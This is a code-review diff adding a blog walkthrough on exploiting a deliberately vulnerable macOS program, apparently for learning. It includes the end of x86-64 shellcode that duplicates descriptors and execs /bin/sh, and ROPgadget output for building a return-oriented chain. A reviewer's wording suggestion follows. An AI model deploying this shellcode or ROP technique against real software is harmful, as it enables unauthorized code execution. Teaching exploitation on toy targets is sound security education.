content/post/walkthrough-exploiting-bugs-to-gain-code-execution.md

```diff
@@ -0,0 +1,338 @@
+    syscall
+
+    mov $3, %rsi
+LC_dup2:
+    mov $0x200005a, %rax          # dup2
+    dec %esi
+    syscall 
+    jg LC_dup2
+
+    mov $0x68732f2f6e69622f, %rax
+    push %rax
+
+    mov $0x200003b, %rax          # execve
+    mov %rsp, %rdi                # "/bin//sh"
+    syscall
+```
+
+Quick OSX primer: All system calls are made via the `syscall` instruction. You select the call you want with `rax`, then pass the parameters through `rdi`, `rsi`, and `rdx`. When the system call returns, `rax` holds the return value.
+
+If you're on OSX and you give that a *.s* extension, you can compile it with clang just like you would a C++ file.
+
+Building the return-oriented program
+------------------------------------
+
+We basically need to find addresses in executable memory that we can jump to in sequence to effectively execute our above shell code. Each of these chainable addresses is referred to as a "gadget".
+
+Before continuing, you make sure you understand exactly how this works by reading up on the [return-oriented programming Wikipedia page](https://en.wikipedia.org/wiki/Return-oriented_programming) or elsewhere.
+
+I'll be using [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) to build this program.
+
+If you run it and just pass our binary, you don't get much to work with:
+
+```
+MacBook-Pro:Desktop cbrown$ ROPgadget --binary /Users/cbrown/Desktop/exploitme             
+Gadgets information
+============================================================
+0x0000000100000d09 : add byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret
+0x0000000100000d37 : add byte ptr [rax], al ; add byte ptr [rax], al ; add rsp, 0x10 ; pop rbp ; ret
+0x0000000100000d0b : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret
+0x0000000100000bd9 : add byte ptr [rax], al ; add rsp, 0x10 ; pop rbp ; ret
+0x0000000100000ba7 : add byte ptr [rax], al ; pop rbp ; ret
+0x0000000100000bdc : add esp, 0x10 ; pop rbp ; ret
+0x0000000100000cc8 : add esp, 0x30 ; pop rbp ; ret
+0x0000000100000ba3 : add esp, 0x330 ; pop rbp ; ret
+0x0000000100000bdb : add rsp, 0x10 ; pop rbp ; ret
+0x0000000100000cc7 : add rsp, 0x30 ; pop rbp ; ret
+0x0000000100000ba2 : add rsp, 0x330 ; pop rbp ; ret
+0x0000000100000d72 : jmp qword ptr [rip + 0x2c0]
+0x0000000100000d07 : or byte ptr [rdx], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret
+0x0000000100000ba9 : pop rbp ; ret
+0x0000000100000baa : ret
+0x0000000100000c0a : ret 0xc931
+0x0000000100000caa : ret 1
+0x0000000100000d7a : ret 2
+0x0000000100000ba5 : xor byte ptr [rbx], al ; add byte ptr [rax], al ; pop rbp ; ret
+0x0000000100000cc5 : xor eax, eax ; add rsp, 0x30 ; pop rbp ; ret
+
+Unique gadgets found: 20
+```
+
+As expected of such a minimal program. But... on OSX at least, you actually get a *lot* to work with, because not only do you have the vulnerable binary, but you also have a lot of shared libraries available:
```

Comment:
I see that "As expected ..." refers to the previous sentence (above the code), but I think you could stand to clarify:

>Not much, as expected of such ...